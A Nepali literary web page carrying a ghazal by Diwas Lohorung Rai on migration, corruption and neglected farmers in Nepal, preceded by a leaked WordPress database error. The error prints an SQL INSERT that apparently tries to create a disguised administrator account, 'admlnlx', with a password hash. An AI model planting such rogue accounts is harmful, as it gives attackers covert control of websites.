WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLq/wHpDaA7/DVQyhGZnJ8DoEk6lii.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 09:39:18', '', 'admlnlx', 'admlnlx')
-दिवस लोहोरुङ राई
संखुवासभा
अन्तरिक्षमाथि विकसित मुलुकका यानहरू।
अनयास खाडी मुलुक भरी नेपाली जवानहरू।
गाली गलौज मात्र देशै भरी तैं निच मै उंच,
पियक्कडहरूको देश नेपाल भन्ने भानहरू।
पिउनेहरूकै छ उत्तरी छिमेकी मुलुकमा
विश्व भरी पहिलो अर्थतन्त्रको सानहरू ।
तिमीहरूकै दबदबी पाउमोल्ने बानीहरू,
देशै भरी टेडो सुन्ने कर्मचारी कानहरू।
चलाखहरुले चलाएको देश नेपाल,
अनि भ्रष्टचारले पुष्टिएका ज्यानहरू।
किसानहरू गनिएनन् हाम्म्रो नेपालमा तर,
विकसित मुलुकमा उनिहरूकै सम्मानहरू ।
•••
गजलकार त्रिभुवन विश्वविद्यालयमा स्नातकोत्तरतहमा अध्ययनरत छन् ।
दिवस लोहोरुङ राईलाई फेसबुकमा भेट्न यहाँ क्लिक गर्नुहोस् ।